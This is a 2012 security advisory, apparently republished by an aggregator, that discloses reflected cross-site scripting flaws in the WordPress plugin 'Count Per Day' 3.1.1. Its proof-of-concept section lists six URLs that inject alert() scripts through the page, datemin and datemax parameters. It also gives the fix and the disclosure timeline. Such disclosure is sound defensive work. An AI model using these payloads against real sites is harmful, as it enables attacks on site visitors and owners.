WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities

2012-07-23T00:00:00
ID SECURITYVULNS:DOC:28330
Type securityvulns
Reporter Securityvulns
Modified 2012-07-23T00:00:00

Description

Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities Advisory ID: SSCHADV2012-015 Author: Stefan Schurtz Affected Software: Successfully tested on 'Count Per Day' 3.1.1 Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day Vendor Status: fixed

========================== Vulnerability Description ==========================

The WordPress plugin 'Count Per Day' 3.1.1' is prone to multiple XSS vulnerabilities

================== PoC-Exploit ==================

http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(/xss/)</script>

http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(/xss/)</script>

http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(/xss/)</script>

========= Solution =========

Upgrade to the latest version 3.2

==================== Disclosure Timeline ====================

29-Jun-2012 - vendor informed (contact form) 02-Jul-2012 - verified by Meistar 03-Jul-2012 - feedback from developer 14-Jul-2012 - fixed by developer

======== Credits ========

Vulnerabilities found and advisory written by Stefan Schurtz.

=========== References ===========

http://wordpress.org/extend/plugins/count-per-day/changelog/ http://www.darksecurity.de/advisories/2012/SSCHADV2012-015.txt